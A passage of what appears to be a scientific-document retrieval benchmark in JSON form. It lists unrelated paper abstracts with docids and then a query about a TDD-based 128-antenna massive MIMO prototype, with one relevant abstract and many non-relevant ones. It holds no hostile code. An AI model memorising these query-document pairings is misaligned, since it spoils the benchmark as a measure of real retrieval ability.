"text": "Novel and compact composite right/left-handed (CRLH) quarter-wave type resonators are proposed in this paper. The resonator can resonate at the frequency where the electrical length is phase-leading or negative, which results in a smaller size as compared to the conventional phase-delayed microstrip-line resonator. Furthermore, it is only half the size of the CRLH half-wave resonator resonating at the same frequency. In addition, the proposed resonator is capable of engineering the multiresonances very close to each other, which makes it suitable to implement the miniaturized multiband microwave components such as diplexers and triplexers. A very compact diplexer and a very compact triplexer are proposed based on the proposed CRLH quarter-wave resonators in this paper and both of them have demonstrated very good performance. Specifically, compared to the referenced works based on the conventional microstrip resonators, the proposed diplexer and triplexer are 50% and 76% smaller than their microstrip counterparts, respectively.",
"title": ""
},
{
"docid": "2bba03660a752f7033e8ecd95eb6bdbd",
"text": "Crowdsensing has the potential to support human-driven sensing and data collection at an unprecedented scale. While many organizers of data collection campaigns may have extensive domain knowledge, they do not necessarily have the skills required to develop robust software for crowdsensing. In this paper, we present Mobile Campaign Designer, a tool that simplifies the creation of mobile crowdsensing applications. Using Mobile Campaign Designer, an organizer is able to define parameters about their crowdsensing campaign, and the tool generates the source code and an executable for a tailored mobile application that embodies the current best practices in crowdsensing. An evaluation of the tool shows that users at all levels of technical expertise are capable of creating a crowdsensing application in an average of five minutes, and the generated applications are comparable in quality to existing crowdsensing applications.",
"title": ""
},
{
"docid": "0a81730588c23c4ed153dab18791bdc2",
"text": "Deep neural networks (DNNs) have shown an inherent vulnerability to adversarial examples which are maliciously crafted on real examples by attackers, aiming at making target DNNs misbehave. The threats of adversarial examples are widely existed in image, voice, speech, and text recognition and classification. Inspired by the previous work, researches on adversarial attacks and defenses in text domain develop rapidly. In order to make people have a general understanding about the field, this article presents a comprehensive review on adversarial examples in text, including attack and defense approaches. We analyze the advantages and shortcomings of recent adversarial examples generation methods and elaborate the efficiency and limitations on the countermeasures. Finally, we discuss the challenges in adversarial texts and provide a research direction of this aspect.",
"title": ""
},
{
"docid": "b3a3dfdc32f9751fabdd6fd06fc598ca",
"text": "L-LDA is a new supervised topic model for assigning \"topics\" to a collection of documents (e.g., Twitter profiles). User studies have shown that L-LDA effectively performs a variety of tasks in Twitter that include not only assigning topics to profiles, but also re-ranking feeds, and suggesting new users to follow. Building upon these promising qualitative results, we here run an extensive quantitative evaluation of L-LDA. We test the extent to which, compared to the competitive baseline of Support Vector Machines (SVM), L-LDA is effective at two tasks: 1) assigning the correct topics to profiles; and 2) measuring the similarity of a profile pair. We find that L-LDA generally performs as well as SVM, and it clearly outperforms SVM when training data is limited, making it an ideal classification technique for infrequent topics and for (short) profiles of moderately active users. We have also built a web application that uses L-LDA to classify any given profile and graphically map predominant topics in specific geographic regions.",
"title": ""
},
{
"docid": "58ab2a362bb9864c09853ca03101c6df",
"text": "Answering reachability queries on directed graphs is ubiquitous in many applications involved with graph-shaped data as one of the most fundamental and important operations. However, it is still highly challenging to efficiently process them on large-scale graphs. Transitive-closure-based methods consume prohibitively large index space, and online-search-based methods answer queries too slowly. Labeling-based methods attain both small index size and query time, but previous indexing algorithms are not scalable at all for processing large graphs of the day. In this paper, we propose new labeling-based methods for reachability queries, referred to as pruned landmark labeling and pruned path labeling. They follow the frameworks of 2-hop cover and 3-hop cover, but their indexing algorithms are based on the recent notion of pruned labeling and improve the indexing time by several orders of magnitude, resulting in applicability to large graphs with tens of millions of vertices and edges. Our experimental results show that they attain remarkable trade-offs between fast query time, small index size and scalability, which previous methods have never been able to achieve. Furthermore, we also discuss the ingredients of the efficiency of our methods by a novel theoretical analysis based on the graph minor theory.",
"title": ""
},
{
"docid": "b80b62e793a200116e52496af7dd4d8b",
"text": "In the great expansion of the social networking activity, young people are the main users whose choices have vast influence. This study uses the flow theory to gauge the impact of Facebook usage on Tunisian students' achievements, with the presumption that the high usage level might reduce students' scholar achievements. The research design suggests that this impact would vary among students with different interests for the university and multitasking capabilities. Facebook usage would develop students' satisfaction with friends and family, which could enhance their academic performance. Analyses from 161 Tunisian students show that Facebook usage does not affect significantly students' academic performance and their satisfaction with the family, whereas it decreases their actual satisfaction with friends. Yet, a high level of satisfaction of the student with his family continues to enhance his academic performance. Overall, though, Facebook usage appears to do not have a significant effect on undergraduate students' academic performance. However, this interdependency is significantly moderated by the student's interest for the university and his multitasking capabilities. Students with multitasking skills and students with initial interest for the university might experience a positive effect of Facebook usage on their studies, as they keep control over their activity and make it a beneficial leisure activity. However, students who do not have these characteristics tend to not have any significant effect. Results help to understand the psychological attitude and consequent behavior of the youths on this platform. Implications, limitations, and further research directions are offered.",
"title": ""
},
{
"docid": "4480840e6dbab77e4f032268ea69bff1",
"text": "This chapter provides a critical survey of emergence definitions both from a conceptual and formal standpoint. The notions of downward / backward causation and weak / strong emergence are specially discussed, for application to complex social system with cognitive agents. Particular attention is devoted to the formal definitions introduced by (Müller 2004) and (Bonabeau & Dessalles, 1997), which are operative in multi-agent frameworks and make sense from both cognitive and social point of view. A diagrammatic 4-Quadrant approach, allow us to understanding of complex phenomena along both interior/exterior and individual/collective dimension.",
"title": ""
},
{
"docid": "b7673dbe46a1118511d811241940e328",
"text": "A 100-MHz–2-GHz closed-loop analog in-phase/ quadrature correction circuit for digital clocks is presented. The proposed circuit consists of a phase-locked loop- type architecture for quadrature error correction. The circuit corrects the phase error to within a 1.5° up to 1 GHz and to within 3° at 2 GHz. It consumes 5.4 mA from a 1.2 V supply at 2 GHz. The circuit was designed in UMC 0.13-<inline-formula> <tex-math notation=\"LaTeX\">$\\mu \\text{m}$ </tex-math></inline-formula> mixed-mode CMOS with an active area of <inline-formula> <tex-math notation=\"LaTeX\">$102\\,\\,\\mu {\\mathrm{ m}} \\times 95\\,\\,\\mu {\\mathrm{ m}}$ </tex-math></inline-formula>. The impact of duty cycle distortion has been analyzed. High-frequency quadrature measurement related issues have been discussed. The proposed circuit was used in two different applications for which the functionality has been verified.",
"title": ""
},
{
"docid": "075e263303b73ee5d1ed6cff026aee63",
"text": "Automatic and accurate whole-heart and great vessel segmentation from 3D cardiac magnetic resonance (MR) images plays an important role in the computer-assisted diagnosis and treatment of cardiovascular disease. However, this task is very challenging due to ambiguous cardiac borders and large anatomical variations among different subjects. In this paper, we propose a novel densely-connected volumetric convolutional neural network, referred as DenseVoxNet, to automatically segment the cardiac and vascular structures from 3D cardiac MR images. The DenseVoxNet adopts the 3D fully convolutional architecture for effective volume-to-volume prediction. From the learning perspective, our DenseVoxNet has three compelling advantages. First, it preserves the maximum information flow between layers by a densely-connected mechanism and hence eases the network training. Second, it avoids learning redundant feature maps by encouraging feature reuse and hence requires fewer parameters to achieve high performance, which is essential for medical applications with limited training data. Third, we add auxiliary side paths to strengthen the gradient propagation and stabilize the learning process. We demonstrate the effectiveness of DenseVoxNet by comparing it with the state-of-the-art approaches from HVSMR 2016 challenge in conjunction with MICCAI, and our network achieves the best dice coefficient. We also show that our network can achieve better performance than other 3D ConvNets but with fewer parameters.",
"title": ""
},
{
"docid": "0575f79872ffd036d48efa731bc451e1",
"text": "When learning a new concept, not all training examples may prove equally useful for training: some may have higher or lower training value than others. The goal of this paper is to bring to the attention of the vision community the following considerations: (1) some examples are better than others for training detectors or classifiers, and (2) in the presence of better examples, some examples may negatively impact performance and removing them may be beneficial. In this paper, we propose an approach for measuring the training value of an example, and use it for ranking and greedily sorting examples. We test our methods on different vision tasks, models, datasets and classifiers. Our experiments show that the performance of current state-of-the-art detectors and classifiers can be improved when training on a subset, rather than the whole training set.",
"title": ""
},
{
"docid": "0c45c5ee2433578fbc29d29820042abe",
"text": "When Andrew John Wiles was 10 years old, he read Eric Temple Bell’s The Last Problem and was so impressed by it that he decided that he would be the first person to prove Fermat’s Last Theorem. This theorem states that there are no nonzero integers a, b, c, n with n > 2 such that an + bn = cn. This object of this paper is to prove that all semistable elliptic curves over the set of rational numbers are modular. Fermat’s Last Theorem follows as a corollary by virtue of work by Frey, Serre and Ribet.",
"title": ""
},
{
"docid": "209ee5fc48584ce98c7dcad664be11ac",
"text": "A traffic surveillance system includes detection of vehicles which involves the detection and identification of license plate numbers. This paper proposes an intelligent approach of detecting vehicular number plates automatically using three efficient algorithms namely Ant colony optimization (ACO) used in plate localization for identifying the edges, a character segmentation and extraction algorithm and a hierarchical combined classification method based on inductive learning and SVM for individual character recognition. Initially the performance of the Ant Colony Optimization algorithm is compared with the existing algorithms for edge detection namely Canny, Prewitt, Roberts, Mexican Hat and Sobel operators. The Ant Colony Optimization used in communication systems has certain limitations when used in edge detection like random initial ant position in the image and the heuristic information being highly dictated by transition probabilities. In this paper, modifications like assigning a well-defined initial ant position and making use of weights to calculate heuristic value which will provide additional information about transition probabilities are used to overcome the limitations. Further a character extraction and segmentation algorithm which uses the concept of Kohonen neural network to identify the position and dimensions of characters is presented along with a comparison with the existing Histogram and Connected Pixels approach. Finally an inductive learning based classification method is compared with the Support Vector Machine based classification method and a combined classification method which uses both inductive learning and Support Vector Machine based approach for character recognition is proposed. The proposed character recognition algorithm may be more efficient than the other two.",
"title": ""
},
{
"docid": "4a1db0cab3812817c3ebb149bd8b3021",
"text": "Structural information in web text provides natural annotations for NLP problems such as word segmentation and parsing. In this paper we propose a discriminative learning algorithm to take advantage of the linguistic knowledge in large amounts of natural annotations on the Internet. It utilizes the Internet as an external corpus with massive (although slight and sparse) natural annotations, and enables a classifier to evolve on the large-scaled and real-time updated web text. With Chinese word segmentation as a case study, experiments show that the segmenter enhanced with the Chinese wikipedia achieves significant improvement on a series of testing sets from different domains, even with a single classifier and local features.",
"title": ""
},
{
"docid": "522cf7baa14071f2196263ccd061fdc2",
"text": "To understand and identify the attack surfaces of a Cyber-Physical System (CPS) is an essential step towards ensuring its security. The growing complexity of the cybernetics and the interaction of independent domains such as avionics, robotics and automotive is a major hindrance against a holistic view CPS. Furthermore, proliferation of communication networks have extended the reach of CPS from a user-centric single platform to a widely distributed network, often connecting to critical infrastructure, e.g., through smart energy initiative. In this manuscript, we reflect on this perspective and provide a review of current security trends and tools for secure CPS. We emphasize on both the design and execution flows and particularly highlight the necessity of efficient attack surface detection. We provide a detailed characterization of attacks reported on different cyber-physical systems, grouped according to their application domains, attack complexity, attack source and impact. Finally, we review the current tools, point out their inadequacies and present a roadmap of future research.",
"title": ""
},
{
"docid": "8c28ec4f3dd42dc9d53fed2e930f7a77",
"text": "If a theory of concept composition aspires to psychological plausibility, it may first need to address several preliminary issues associated with naturally occurring human concepts: content variability, multiple representational forms, and pragmatic constraints. Not only do these issues constitute a significant challenge for explaining individual concepts, they pose an even more formidable challenge for explaining concept compositions. How do concepts combine as their content changes, as different representational forms become active, and as pragmatic constraints shape processing? Arguably, concepts are most ubiquitous and important in compositions, relative to when they occur in isolation. Furthermore, entering into compositions may play central roles in producing the changes in content, form, and pragmatic relevance observed for individual concepts. Developing a theory of concept composition that embraces and illuminates these issues would not only constitute a significant contribution to the study of concepts, it would provide insight into the nature of human cognition. The human ability to construct and combine concepts is prolific. On the one hand, people acquire tens of thousands of concepts for diverse categories of settings, agents, objects, actions, mental states, bodily states, properties, relations, and so forth. On the other, people combine these concepts to construct infinite numbers of more complex concepts, as the open-ended phrases, sentences, and texts that humans produce effortlessly and ubiquitously illustrate. Major changes in the brain, the emergence of language, and new capacities for social cognition all probably played central roles in the evolution of these impressive conceptual abilities (e.g., Deacon 1997; Donald 1993; Tomasello 2009). In psychology alone, much research addresses human concepts (e.g., Barsalou 2012;Murphy 2002; Smith andMedin 1981) and concept composition (often referred to as conceptual combination; e.g., Costello and Keane 2000; Gagné and Spalding 2014; Hampton 1997; Hampton and Jönsson 2012;Medin and Shoben 1988;Murphy L.W. Barsalou (✉) Institute of Neuroscience and Psychology, University of Glasgow, Glasgow, Scotland e-mail: lawrence.barsalou@glasgow.ac.uk © The Author(s) 2017 J.A. Hampton and Y. Winter (eds.), Compositionality and Concepts in Linguistics and Psychology, Language, Cognition, and Mind 3, DOI 10.1007/978-3-319-45977-6_2 9 1988;Wisniewski 1997;Wu andBarsalou 2009).More generally across the cognitive sciences, much additional research addresses concepts and the broader construct of compositionality (for a recent collection, see Werning et al. 2012). 1 Background Framework A grounded approach to concepts. Here I assume that a concept is a dynamical distributed network in the brain coupled with a category in the environment or experience, with this network guiding situated interactions with the category’s instances (for further detail, see Barsalou 2003b, 2009, 2012, 2016a, 2016b). The concept of bicycle, for example, represents and guides interactions with the category of bicycles in the world. Across interactions with a category’s instances, a concept develops in memory by aggregating information from perception, action, and internal states. Thus, the concept of bicycle develops from aggregating multimodal information related to bicycles across the situations in which they are experienced. As a consequence of using selective attention to extract information relevant to the concept of bicycle from the current situation (e.g., a perceived bicycle), and then using integration mechanisms to integrate it with other bicycle information already in memory, aggregate information for the category develops continually (Barsalou 1999). As described later, however, background situational knowledge is also captured that plays important roles in conceptual processing (Barsalou 2016b, 2003b; Yeh and Barsalou 2006). Although learning plays central roles in establishing concepts, genetic and epigenetic processes constrain the features that can be represented for a concept, and also their integration in the brain’s association areas (e.g., Simmons and Barsalou 2003). For example, biologically-based neural circuits may anticipate the conceptual structure of evolutionarily important concepts, such as agents, minds, animals, foods, and tools. Once the conceptual system is in place, it supports virtually all other forms of cognitive activity, both online in the current situation and offline when representing the world in language, memory, and thought (e.g., Barsalou 2012, 2016a, 2016b). From the perspective developed here, when conceptual knowledge is needed for a task, concepts produce situation-specific simulations of the relevant category dynamically, where a simulation attempts to reenact the kind of neural and bodily states associated with processing the category. On needing conceptual knowledge about bicycles, for example, a small subset of the distributed bicycle network in the brain becomes active to simulate what it would be like to interact with an actual bicycle. This multimodal simulation provides anticipatory inferences about what is likely to be perceived further for the bicycle in the current situation, how to interact with it effectively, and what sorts of internal states might result (Barsalou 2009). The specific bicycle simulation that becomes active is one of infinitely many simulations that could be constructed dynamically from the bicycle network—the entire network never becomes fully active. Typically, simulations remain unconscious, at least to a large extent, while causally influencing cognition, affect, and 10 L.W. Barsalou",
"title": ""
},
{
"docid": "72bb768adc44f6b9c5c6ac08161c93c2",
"text": "A central challenge to using first-order methods for optimizing nonconvex problems is the presence of saddle points. First-order methods often get stuck at saddle points, greatly deteriorating their performance. Typically, to escape from saddles one has to use secondorder methods. However, most works on second-order methods rely extensively on expensive Hessian-based computations, making them impractical in large-scale settings. To tackle this challenge, we introduce a generic framework that minimizes Hessianbased computations while at the same time provably converging to secondorder critical points. Our framework carefully alternates between a first-order and a second-order subroutine, using the latter only close to saddle points, and yields convergence results competitive to the state-of-the-art. Empirical results suggest that our strategy also enjoys a good practical performance.",
"title": ""
},
{
"docid": "ec392d39f47286c7fc5788e10c3d5481",
"text": "A robust skin detector is the primary need of many fields of computer vision, including face detection, gesture recognition, and pornography filtering. Less than 10 years ago, the first paper on automatic pornography filtering was published. Since then, different researchers claim different color spaces to be the best choice for skin detection in pornography filtering. Unfortunately, no comprehensive work is performed on evaluating different color spaces and their performance for detecting naked persons. As such, researchers usualy refer to the results of skin detection based on the work doen for face detection, which underlies different imaging conditions. In this paper, we examine 21 color spaces in all their possible representations for pixel-based skin detection in pornographic images. Consequently, this paper holds a large investigation in the field of skin detection, and a specific run on the pornographic images.",
"title": ""
},
{
"docid": "2b97e03fa089cdee0bf504dd85e5e4bb",
"text": "One of the most severe threats to revenue and quality of service in telecom providers is fraud. The advent of new technologies has provided fraudsters new techniques to commit fraud. SIM box fraud is one of such fraud that has emerged with the use of VOIP technologies. In this work, a total of nine features found to be useful in identifying SIM box fraud subscriber are derived from the attributes of the Customer Database Record (CDR). Artificial Neural Networks (ANN) has shown promising solutions in classification problems due to their generalization capabilities. Therefore, supervised learning method was applied using Multi layer perceptron (MLP) as a classifier. Dataset obtained from real mobile communication company was used for the experiments. ANN had shown classification accuracy of 98.71 %.",
"title": ""
},
{
"docid": "23737f898d9b50ff7741096a59054759",
"text": "We present a new method for speech denoising and robust speech recognition. Using the framework of probabilistic models allows us to integrate detailed speech models and models of realistic non-stationary noise signals in a principled manner. The framework transforms the denoising problem into a problem of Bayes-optimal signal estimation, producing minimum mean square error estimators of desired features of clean speech from noisy data. We describe a fast and efficient implementation of an algorithm that computes these estimators. The effectiveness of this algorithm is demonstrated in robust speech recognition experiments, using the Wall Street Journal speech corpus and Microsoft Whisper large-vocabulary continuous speech recognizer. Results show significantly lower word error rates than those under noisy-matched condition. In particular, when the denoising algorithm is applied to the noisy training data and subsequently the recognizer is retrained, very low error rates are obtained.",
"title": ""
},
{
"docid": "c0551510c63a42682abc4ea008f81683",
"text": "Deep generative models have recently yielded encouraging results in producing subjectively realistic samples of complex data. Far less attention has been paid to making these generative models interpretable. In many scenarios, ranging from scientific applications to finance, the observed variables have a natural grouping. It is often of interest to understand systems of interaction amongst these groups, and latent factor models (LFMs) are an attractive approach. However, traditional LFMs are limited by assuming a linear correlation structure. We present an output interpretable VAE (oi-VAE) for grouped data that models complex, nonlinear latent-to-observed relationships. We combine a structured VAE comprised of group-specific generators with a sparsity-inducing prior. We demonstrate that oi-VAE yields meaningful notions of interpretability in the analysis of motion capture and MEG data. We further show that in these situations, the regularization inherent to oi-VAE can actually lead to improved generalization and learned generative processes.",
"title": ""
}
] | scidocsrr |
9f1b5676a0bd25fb31ca2db199fb5516 | Design and implementation of a tdd-based 128-antenna massive MIMO prototype system | [
{
"docid": "3e111f220be59d347d6acd9d73b2c653",
"text": "This paper considers a multiple-input multiple-output (MIMO) receiver with very low-precision analog-to-digital convertors (ADCs) with the goal of developing massive MIMO antenna systems that require minimal cost and power. Previous studies demonstrated that the training duration should be relatively long to obtain acceptable channel state information. To address this requirement, we adopt a joint channel-and-data (JCD) estimation method based on Bayes-optimal inference. This method yields minimal mean square errors with respect to the channels and payload data. We develop a Bayes-optimal JCD estimator using a recent technique based on approximate message passing. We then present an analytical framework to study the theoretical performance of the estimator in the large-system limit. Simulation results confirm our analytical results, which allow the efficient evaluation of the performance of quantized massive MIMO systems and provide insights into effective system design.",
"title": ""
}
] | [
{
"docid": "de5e6be7d21bd93cbc042c40c9bf6ef4",
"text": "We present STRUCTURE HARVESTER (available at http://taylor0.biology.ucla.edu/structureHarvester/ ), a web-based program for collating results generated by the program STRUCTURE. The program provides a fast way to assess and visualize likelihood values across multiple values of K and hundreds of iterations for easier detection of the number of genetic groups that best fit the data. In addition, STRUCTURE HARVESTER will reformat data for use in downstream programs, such as CLUMPP.",
"title": ""
},
{
"docid": "eb286d4a7406dc235820ccb848844840",
"text": "This paper describes the design and testing of a new introductory programming language, GRAIL1. GRAIL was designed to minimise student syntax errors, and hence allow the study of the impact of syntax errors on learning to program. An experiment was conducted using students learning programming for the first time. The students were split into two groups, one group learning LOGO and the other GRAIL. The resulting code was then analysed for syntax and logic errors. The groups using LOGO made more errors than the groups using GRAIL, which shows that choice of programming language can have a substantial impact on error rates of novice programmers.",
"title": ""
},
{
"docid": "6eaa0d1b6a7e55eca070381954638292",
"text": "Unsupervised learning is of growing interest because it unlocks the potential held in vast amounts of unlabeled data to learn useful representations for inference. Autoencoders, a form of generative model, may be trained by learning to reconstruct unlabeled input data from a latent representation space. More robust representations may be produced by an autoencoder if it learns to recover clean input samples from corrupted ones. Representations may be further improved by introducing regularization during training to shape the distribution of the encoded data in the latent space. We suggest denoising adversarial autoencoders (AAEs), which combine denoising and regularization, shaping the distribution of latent space using adversarial training. We introduce a novel analysis that shows how denoising may be incorporated into the training and sampling of AAEs. Experiments are performed to assess the contributions that denoising makes to the learning of representations for classification and sample synthesis. Our results suggest that autoencoders trained using a denoising criterion achieve higher classification performance and can synthesize samples that are more consistent with the input data than those trained without a corruption process.",
"title": ""
},
{
"docid": "c35306b0ec722364308d332664c823f8",
"text": "The uniform asymmetrical microstrip parallel coupled line is used to design the multi-section unequal Wilkinson power divider with high dividing ratio. The main objective of the paper is to increase the trace widths in order to facilitate the construction of the power divider with the conventional photolithography method. The separated microstrip lines in the conventional Wilkinson power divider are replaced with the uniform asymmetrical parallel coupled lines. An even-odd mode analysis is used to calculate characteristic impedances and then the per-unit-length capacitance and inductance parameter matrix are used to calculate the physical dimension of the power divider. To clarify the advantages of this method, two three-section Wilkinson power divider with an unequal power-division ratio of 1 : 2.5 are designed and fabricated and measured, one in the proposed configuration and the other in the conventional configuration. The simulation and the measurement results show that not only the specified design goals are achieved, but also all the microstrip traces can be easily implemented in the proposed power divider.",
"title": ""
},
{
"docid": "46f95796996d4638afcc7b703a1f3805",
"text": "One of the main challenges in Grid systems is designing an adaptive, scalable, and model-independent method for job scheduling to achieve a desirable degree of load balancing and system efficiency. Centralized job scheduling methods have some drawbacks, such as single point of failure and lack of scalability. Moreover, decentralized methods require a coordination mechanism with limited communications. In this paper, we propose a multi-agent approach to job scheduling in Grid, named Centralized Learning Distributed Scheduling (CLDS), by utilizing the reinforcement learning framework. The CLDS is a model free approach that uses the information of jobs and their completion time to estimate the efficiency of resources. In this method, there are a learner agent and several scheduler agents that perform the task of learning and job scheduling with the use of a coordination strategy that maintains the communication cost at a limited level. We evaluated the efficiency of the CLDS method by designing and performing a set of experiments on a simulated Grid system under different system scales and loads. The results show that the CLDS can effectively balance the load of system even in large scale and heavy loaded Grids, while maintains its adaptive performance and scalability.",
"title": ""
},
{
"docid": "d7793313ab21020e79e41817b8372ee8",
"text": "We present a new approach to referring expression generation, casting it as a density estimation problem where the goal is to learn distributions over logical expressions identifying sets of objects in the world. Despite an extremely large space of possible expressions, we demonstrate effective learning of a globally normalized log-linear distribution. This learning is enabled by a new, multi-stage approximate inference technique that uses a pruning model to construct only the most likely logical forms. We train and evaluate the approach on a new corpus of references to sets of visual objects. Experiments show the approach is able to learn accurate models, which generate over 87% of the expressions people used. Additionally, on the previously studied special case of single object reference, we show a 35% relative error reduction over previous state of the art.",
"title": ""
},
{
"docid": "b7b1153067a784a681f2c6d0105acb2a",
"text": "Investigations of the human connectome have elucidated core features of adult structural networks, particularly the crucial role of hub-regions. However, little is known regarding network organisation of the healthy elderly connectome, a crucial prelude to the systematic study of neurodegenerative disorders. Here, whole-brain probabilistic tractography was performed on high-angular diffusion-weighted images acquired from 115 healthy elderly subjects (age 76-94 years; 65 females). Structural networks were reconstructed between 512 cortical and subcortical brain regions. We sought to investigate the architectural features of hub-regions, as well as left-right asymmetries, and sexual dimorphisms. We observed that the topology of hub-regions is consistent with a young adult population, and previously published adult connectomic data. More importantly, the architectural features of hub connections reflect their ongoing vital role in network communication. We also found substantial sexual dimorphisms, with females exhibiting stronger inter-hemispheric connections between cingulate and prefrontal cortices. Lastly, we demonstrate intriguing left-lateralized subnetworks consistent with the neural circuitry specialised for language and executive functions, whilst rightward subnetworks were dominant in visual and visuospatial streams. These findings provide insights into healthy brain ageing and provide a benchmark for the study of neurodegenerative disorders such as Alzheimer's disease (AD) and frontotemporal dementia (FTD).",
"title": ""
},
{
"docid": "e2d1f265ab2a93ed852069288b90bcc4",
"text": "This paper presents a novel multi-view dense point cloud generation algorithm based on low-altitude remote sensing images. The proposed method was designed to be especially effective in enhancing the density of point clouds generated by Multi-View Stereo (MVS) algorithms. To overcome the limitations of MVS and dense matching algorithms, an expanded patch was set up for each point in the point cloud. Then, a patch-based Multiphoto Geometrically Constrained Matching (MPGC) was employed to optimize points on the patch based on least square adjustment, the space geometry relationship, and epipolar line constraint. The major advantages of this approach are twofold: (1) compared with the MVS method, the proposed algorithm can achieve denser three-dimensional (3D) point cloud data; and (2) compared with the epipolar-based dense matching method, the proposed method utilizes redundant measurements to weaken the influence of occlusion and noise on matching results. Comparison studies and experimental results have validated the accuracy of the proposed algorithm in low-altitude remote sensing image dense point cloud generation.",
"title": ""
},
{
"docid": "f1efe8868f19ccbb4cf2ab5c08961cdb",
"text": "High peak-to-average power ratio (PAPR) has been one of the major drawbacks of orthogonal frequency division multiplexing (OFDM) systems. In this letter, we propose a novel PAPR reduction scheme, known as PAPR reducing network (PRNet), based on the autoencoder architecture of deep learning. In the PRNet, the constellation mapping and demapping of symbols on each subcarrier is determined adaptively through a deep learning technique, such that both the bit error rate (BER) and the PAPR of the OFDM system are jointly minimized. We used simulations to show that the proposed scheme outperforms conventional schemes in terms of BER and PAPR.",
"title": ""
},
{
"docid": "dd45eef2b028866faa7d7d133077059a",
"text": "In the past 15 years, multiple articles have appeared that target fascia as an important component of treatment in the field of physical medicine and rehabilitation. To better understand the possible actions of fascial treatments, there is a need to clarify the definition of fascia and how it interacts with various other structures: muscles, nerves, vessels, organs. Fascia is a tissue that occurs throughout the body. However, different kinds of fascia exist. In this narrative review, we demonstrate that symptoms related to dysfunction of the lymphatic system, superficial vein system, and thermoregulation are closely related to dysfunction involving superficial fascia. Dysfunction involving alterations in mechanical coordination, proprioception, balance, myofascial pain, and cramps are more related to deep fascia and the epimysium. Superficial fascia is obviously more superficial than the other types and contains more elastic tissue. Consequently, effective treatment can probably be achieved with light massage or with treatment modalities that use large surfaces that spread the friction in the first layers of the subcutis. The deep fasciae and the epymisium require treatment that generates enough pressure to reach the surface of muscles. For this reason, the use of small surface tools and manual deep friction with the knuckles or elbows are indicated. Due to different anatomical locations and to the qualities of the fascial tissue, it is important to recognize that different modalities of approach have to be taken into consideration when considering treatment options.",
"title": ""
},
{
"docid": "4b84582e69cd8393ba4dfefb073bf74e",
"text": "In maintenance of concrete structures, crack detection is important for the inspection and diagnosis of concrete structures. However, it is difficult to detect cracks automatically. In this paper, we propose a robust automatic crack-detection method from noisy concrete surface images. The proposed method includes two preprocessing steps and two detection steps. The first preprocessing step is a subtraction process using the median filter to remove slight variations like shadings from concrete surface images; only an original image is used in the preprocessing. In the second preprocessing step, a multi-scale line filter with the Hessian matrix is used both to emphasize cracks against blebs or stains and to adapt the width variation of cracks. After the preprocessing, probabilistic relaxation is used to detect cracks coarsely and to prevent noises. It is unnecessary to optimize any parameters in probabilistic relaxation. Finally, using the results from the relaxation process, a locally adaptive thresholding is performed to detect cracks more finely. We evaluate robustness and accuracy of the proposed method quantitatively using 60 actual noisy concrete surface images.",
"title": ""
},
{
"docid": "5dce9610b3985fb7d9628d4c201ef66e",
"text": "The recent advances in state estimation, perception, and navigation algorithms have significantly contributed to the ubiquitous use of quadrotors for inspection, mapping, and aerial imaging. To further increase the versatility of quadrotors, recent works investigated the use of an adaptive morphology, which consists of modifying the shape of the vehicle during flight to suit a specific task or environment. However, these works either increase the complexity of the platform or decrease its controllability. In this letter, we propose a novel, simpler, yet effective morphing design for quadrotors consisting of a frame with four independently rotating arms that fold around the main frame. To guarantee stable flight at all times, we exploit an optimal control strategy that adapts on the fly to the drone morphology. We demonstrate the versatility of the proposed adaptive morphology in different tasks, such as negotiation of narrow gaps, close inspection of vertical surfaces, and object grasping and transportation. The experiments are performed on an actual, fully autonomous quadrotor relying solely on onboard visual-inertial sensors and compute. No external motion tracking systems and computers are used. This is the first work showing stable flight without requiring any symmetry of the morphology.",
"title": ""
},
{
"docid": "b5c65533fd768b9370d8dc3aba967105",
"text": "Agent-based complex systems are dynamic networks of many interacting agents; examples include ecosystems, financial markets, and cities. The search for general principles underlying the internal organization of such systems often uses bottom-up simulation models such as cellular automata and agent-based models. No general framework for designing, testing, and analyzing bottom-up models has yet been established, but recent advances in ecological modeling have come together in a general strategy we call pattern-oriented modeling. This strategy provides a unifying framework for decoding the internal organization of agent-based complex systems and may lead toward unifying algorithmic theories of the relation between adaptive behavior and system complexity.",
"title": ""
},
{
"docid": "47b5e127b64cf1842841afcdb67d6d84",
"text": "This work describes the aerodynamic characteristic for aircraft wing model with and without bird feather like winglet. The aerofoil used to construct the whole structure is NACA 653-218 Rectangular wing and this aerofoil has been used to compare the result with previous research using winglet. The model of the rectangular wing with bird feather like winglet has been fabricated using polystyrene before design using CATIA P3 V5R13 software and finally fabricated in wood. The experimental analysis for the aerodynamic characteristic for rectangular wing without winglet, wing with horizontal winglet and wing with 60 degree inclination winglet for Reynolds number 1.66×10, 2.08×10 and 2.50×10 have been carried out in open loop low speed wind tunnel at the Aerodynamics laboratory in Universiti Putra Malaysia. The experimental result shows 25-30 % reduction in drag coefficient and 10-20 % increase in lift coefficient by using bird feather like winglet for angle of attack of 8 degree. Keywords—Aerofoil, Wind tunnel, Winglet, Drag Coefficient.",
"title": ""
},
{
"docid": "78b7987361afd8c7814ee416c81a311b",
"text": "This paper presents the characterization of various types of SubMiniature version A (SMA) connectors. The characterization is performed by measurements in frequency and time domain. The SMA connectors are mounted on microstrip (MS) and conductor-backed coplanar waveguide (CPW-CB) manufactured on high-frequency (HF) laminates. The designed characteristic impedance of the transmission lines is 50 Ω and deviation from the designed characteristic impedance is measured. The measurement results suggest that for a given combination of the transmission line and SMA connector, the discontinuity in terms of characteristic impedance can be significantly improved by choosing the right connector type.",
"title": ""
},
{
"docid": "088308b06392780058dd8fa1686c5c35",
"text": "Every company should be able to demonstrate own efficiency and effectiveness by used metrics or other processes and standards. Businesses may be missing a direct comparison with competitors in the industry, which is only possible using appropriately chosen instruments, whether financial or non-financial. The main purpose of this study is to describe and compare the approaches of the individual authors. to find metric from reviewed studies which organization use to measuring own marketing activities with following separating into financial metrics and non-financial metrics. The paper presents advance in useable metrics, especially financial and non-financial metrics. Selected studies, focusing on different branches and different metrics, were analyzed by the authors. The results of the study is describing relevant metrics to prove efficiency in varied types of organizations in connection with marketing effectiveness. The studies also outline the potential methods for further research focusing on the application of metrics in a diverse environment. The study contributes to a clearer idea of how to measure performance and effectiveness.",
"title": ""
},
{
"docid": "0305bac1e39203b49b794559bfe0b376",
"text": "The emerging field of semantic web technologies promises new stimulus for Software Engineering research. However, since the underlying concepts of the semantic web have a long tradition in the knowledge engineering field, it is sometimes hard for software engineers to overlook the variety of ontology-enabled approaches to Software Engineering. In this paper we therefore present some examples of ontology applications throughout the Software Engineering lifecycle. We discuss the advantages of ontologies in each case and provide a framework for classifying the usage of ontologies in Software Engineering.",
"title": ""
},
{
"docid": "86eefd1336d047e16b49297ae628cb6a",
